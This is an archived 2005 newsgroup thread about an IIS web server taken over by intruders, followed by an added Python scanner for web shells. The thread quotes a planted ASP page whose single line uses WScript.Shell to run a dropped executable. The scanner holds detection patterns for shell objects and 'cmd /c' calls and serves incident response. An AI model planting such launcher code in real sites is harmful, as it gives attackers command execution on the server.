Re: IIS 5 Compromisation

From: Saturday Night Paulsy (pkorosi_at_redpepper.com.au)
Date: 04/07/05

    Date: Thu, 7 Apr 2005 11:36:15 +1000


    ha ha - nice one Jeff,

    I might be dumb but I ain't that stupid. I admit I am no security
    specialist - I'm a programmer. I thought someone here
    might be able to shed some light, judging by the responses to the questions
    in this group, some of which quite frankly
    don't even belong in this group.

    As for your suggestions, administrator only ftp access, 13 character strong
    password - it would even take YOU a
    century to work it out. All database submissions/requests are filtered
    against SQL injection attacks using regex. I simply
    can't see any way in via that side.

    Anyways - it turns out it's the Win32.IRCFlood trojan, and appears to be
    fairly new as the only patch available to deal with it
    is dated yesterday. And, as my MSCE friend has just told me (after some
    research), firewalls won't necessarily stop it from getting on
    the box - only stop the gigs of *** from getting put on.

    For anyone that might be interested, it was probably downloaded by someone
    doing "legit" work on the box by browsing. That's what
    the msce told me, anyways - and he's a good deal brighter than your average
    minesweeper certified solitaire expert.

    Finally, thanks for your help. Next time I reckon I'll just fart 'cause
    it'll save all this typing time. I could've been drinking coffee instead.

    "Jeff Cochran" <jeff.nospam@zina.com> wrote in message
    news:42616af5.1154390806@msnews.microsoft.com...
    > On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
    > <pkorosi@redpepper.com.au> wrote:
    >
    > >Hi all,
    > >
    > >my company has several servers acting as web servers hosted at an ISP and
    > >one of them was compromised by some warez bunnies.
    > >All the servers have the latest patches and anti virus software running, but
    > >no firewall...
    > >
    > >Several files appeared in a folder off one of the webs, being
    > >
    > >kill.exe
    > >shellconfig.ocx
    > >shellsuccesslog.ocx
    > >win.asp
    > >start.asp
    > >shellhost32.exe
    > >
    > >
    > >win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
    > >start.asp reads as follows
    > >
    > ><%
    > >CreateObject("WScript.Shell").Run("shellhost32.exe")
    > >%>
    > ><h1>Yes, you made it!! Good job dude!<\h1>
    > >
    > >
    > >My question is, has anyone encountered this and how do they get the files
    > >there. Two questions, really.
    >
    > To find out how they got there, check your audit logs and firewall
    > logs. Oh yeah, you already figured out that they got there because
    > you weren't secured and had no firewall. Likely you weren't auditing
    > either. Possibly hadn't turned off anonymous file upload in FTP.
    > Possibly your host got hacked. Possibly a SQL attack. Possibly using
    > "password" as a password wasn't that smart. Too many possiblies for
    > anyone to tell you for sure.
    >
    > >Any help would be greatly appreciated, as they uploaded a significant amount
    > >of German DVDs and other garbage onto the server at our expense.
    >
    > Bummer. Flatten the box, reinstall from scratch, patch, secure and
    > get that firewall installed. Live and learn.
    >
    > Jeff
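
The start.asp quoted above is a one-line web shell: classic ASP instantiates WScript.Shell and runs a dropped executable in the security context of the web server process, so any request for that page launches the binary. The check a responder would run before flattening the box is a sweep of the web root for script files that spawn processes and for executables dropped among web content. The following is an added example, written for this page and not code from either poster; it assumes a classic-ASP site under a single directory, and the sample tree it scans is constructed here to mirror the file names listed in the thread (the .exe content is a stub, not a real binary).

```python
"""Sweep a classic-ASP web root for shell-capable scripts and dropped binaries.

Added example for this thread, not code from the original posts. The sample
web root below is constructed to mirror the file names the poster listed.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample web root. start.asp is the content quoted in the post;
# default.asp is a benign control; the .exe is a stub header, not a real PE.
SAMPLE_FILES = {
    "start.asp": (
        '<%\n'
        'CreateObject("WScript.Shell").Run("shellhost32.exe")\n'
        '%>\n'
        '<h1>Yes, you made it!! Good job dude!<\\h1>\n'
    ),
    "default.asp": '<%\nResponse.Write("Hello")\n%>\n',
    "shellhost32.exe": b"MZ\x90\x00",
    "images/logo.gif": b"GIF89a",
}

SCRIPT_EXTS = {".asp", ".asa", ".inc"}
BINARY_EXTS = {".exe", ".dll", ".ocx", ".com", ".bat", ".cmd"}

# What an ASP web shell needs: a COM object that can launch processes or
# write files, or a direct call to a launch method / cmd.exe.
SHELL_PATTERNS = {
    "com-shell-object": re.compile(
        r'CreateObject\s*\(\s*"(WScript\.Shell|Shell\.Application)"', re.I),
    "fso-object": re.compile(
        r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"', re.I),
    "process-launch": re.compile(r'\.(Run|Exec|ShellExecute)\s*\(', re.I),
    "cmd-invocation": re.compile(r'\bcmd(\.exe)?\s*/c\b', re.I),
}


def write_sample_root(root):
    """Materialise the constructed sample tree under root and return root."""
    for rel, content in SAMPLE_FILES.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        if isinstance(content, bytes):
            path.write_bytes(content)
        else:
            path.write_text(content)
    return root


def scan_script(path):
    """Return (pattern_name, line_no, line) for every suspicious line."""
    hits = []
    text = path.read_text(errors="replace")
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SHELL_PATTERNS.items():
            if pattern.search(line):
                hits.append((name, lineno, line.strip()))
    return hits


def scan_webroot(root):
    """Map relative path -> findings for scripts that can spawn processes
    and for executable-type files sitting in the content tree."""
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        ext = path.suffix.lower()
        if ext in BINARY_EXTS:
            findings[rel] = [("executable-in-webroot", 0, "")]
        elif ext in SCRIPT_EXTS:
            hits = scan_script(path)
            if hits:
                findings[rel] = hits
    return findings


def demo():
    """Build the constructed web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_webroot(write_sample_root(Path(tmp)))


if __name__ == "__main__":
    for rel, hits in demo().items():
        for name, lineno, line in hits:
            print(f"{rel}:{lineno}: {name} {line}")
```

Run against a real web root by calling scan_webroot(Path(r"C:\Inetpub\wwwroot")) instead of demo(); a clean site with no upload feature should report nothing, and any script hit or stray binary is a file to preserve for the investigation before the box is rebuilt.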

